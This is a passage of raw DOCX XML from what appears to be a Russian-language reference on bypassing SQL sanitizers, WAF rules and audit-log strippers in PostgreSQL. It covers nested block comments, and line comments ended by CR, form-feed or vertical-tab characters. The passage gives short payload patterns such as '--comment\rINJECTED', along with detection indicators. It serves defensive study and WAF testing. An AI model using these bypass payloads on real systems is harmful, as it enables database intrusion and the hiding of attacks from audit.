          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход sanitizer-а с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non-greedy фильтром: payload пройдёт через filter sanitizer-а, в PG-парсере прокинется как валидный SQL с UNION.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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход sanitizer-а с greedy фильтром: greedy удаляет лишнее, но оставшийся SQL валиден для PG.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">log-стрипперов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для скрытия атаки от audit. Не атака сама по себе, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">defensive evasion</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Non-nested-aware regex-фильтр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python re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non-greedy, или другая SQL-naive формула) не учитывает PG-специфику.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Greedy regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> удаляет слишком много, оставляя другой синтаксис, который не покрывается WAF-правилом на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DROP</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AST-парсер вместо regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> покрывает обе формы — но AST-парсер на pre-WAF-уровне дорогой и редко используется.</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block-comment грамматика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: documentation https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-COMMENTS. Цитата: *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> block comments nest, so that nesting is permitted: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* my /* nested */ comment */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is treated as a complete comment."*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Реализация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: в PG-source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть state </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (comment state) с counter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xcdepth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Каждый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++xcdepth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; каждый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--xcdepth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; comment закрывается только когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xcdepth = 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Стабильно с PG 7.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (когда parser был переписан на flex). Поведение не менялось.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MSSQL/sqlite/MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — non-nested. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уникальная PG-фича</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> среди major СУБД, что делает 3.12.1 PG-specific.</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7.4+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — nested-aware парсер.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3.12.1 — про обход input-фильтра; целевая атака может требовать любых privileges (см. 3.6, 3.7).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Уязвимый sanitizer/log-стриппер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: основной требование. Если в pipeline только AST-уровневый SQL-валидатор — 3.12.1 не пройдёт.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 self-hosted. Парсер один и тот же.</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Условная вложенность в ORM-сгенерированных запросах</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WITH cte /* hint: materialize */ AS (...) SELECT /* tag: report-2026 */ * FROM cte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — два </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">независимых</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> комментария-метки, не вложенных. Это легитимно.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Auto-generated SQL комментарии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: pgBadger / log-анализаторы вставляют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* user=foo, host=bar */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> префиксы — фиксированный паттерн, не вложенный.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Multi-line block comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* This is a multi-line comment\n with multiple lines\n explaining the query */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — допускает любой текст внутри, но не reads-back nested-marker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака отличается: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 ... /* ... */ ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> структура в payload** — почти всегда обход sanitizer-а.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**Несбалансированные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payload** — индикатор атаки на парсер или log-strippere.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 ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с UNION или DDL keywords внутри** — comment-обёртка опасного SQL.</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7.4 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые) — nested block comments стабильны.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3.9.6 (Whitespace tricks)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обхода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-regex. Принципиально другой класс задачи, но та же грамматическая фича. Граница закреплена в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md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3.9.0 (WAF категории 3.9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержит правило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3.12.1 — про обход именно этого правила в его слабой форме.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3.12.2 (`--` и CRLF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс. 3.12.1 — block comments, 3.12.2 — line comments. Часто комбинируются.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после прохождения sanitizer-а, stacked queries для активации второй команды (заблокировано extended-protocol; 3.10.1 — single-command альтернатива).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downstream leak после прохождения через nested-comment-обход.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регекса для несбалансированных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для nested-comment-паттернов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3.12 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.12.md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Comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация nested.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source: src/backend/parser/scan.l (xc state, xcdepth counter)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — реализация.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SQL standard differences: nested vs flat comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — сравнение с другими СУБД.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 comment-based filter bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.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comment tricks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.2 `--` и переводы строк (`\r`, `\n`, `\r\n`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">**Уязвимый код — см. 3.9.0 (общий WAF с правилом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PostgreSQL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-комментарий идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до конца строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PG Lexical Structure §4.1.5: *"A single-line comment is introduced by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and continues to the end of the line (the next newline)."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что считается «концом строки» — критично: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PG-парсер</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(LF, 0x0A) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">или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(CR, 0x0D) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">независимо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрывает однострочный комментарий. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--text\r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрывается на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--text\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрывается на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--text\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрывается на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(потом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 уже после конца комментария, просто whitespace).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 Python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value.replace('\r\n', '\n').replace('\r', '\n')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нормализует к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Это распространённый паттерн.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Sanitizer на bytes-уровне</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ModSecurity raw byte match): часто работает только с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игнорируя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HTTP/HTML-уровень</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: framework-decode разворачивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0A</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%0D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Browser обычно посылает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в text/form fields. JS fetch API может отправить любой byte sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Три класса атак:</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CR-only bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: sanitizer strip-ает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но не отдельный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Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--comment\rINJECTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sanitizer не видит line-terminator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считает весь остаток комментарием. PG обрывает на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исполняет INJECTED.</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FF/VT bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: form feed (0x0C) и vertical tab (0x0B) — PG-парсер их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
